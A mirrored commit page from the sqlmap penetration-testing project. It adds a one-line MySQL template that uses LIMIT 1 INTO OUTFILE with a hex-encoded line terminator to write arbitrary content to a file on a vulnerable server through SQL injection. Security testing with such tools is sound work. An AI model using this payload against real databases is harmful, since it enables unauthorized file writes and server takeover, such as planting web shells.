mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-01-24 08:14:24 +03:00
added SQL file to write a file with LIMIT statement on MySQL
This commit is contained in:
parent
cbe8f41746
commit
baeffbf149
1
procs/mysql/write_file_limit.sql
Normal file
1
procs/mysql/write_file_limit.sql
Normal file
|
@ -0,0 +1 @@
|
||||||
|
LIMIT 1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING% --
|
Loading…
Reference in New Issue
Block a user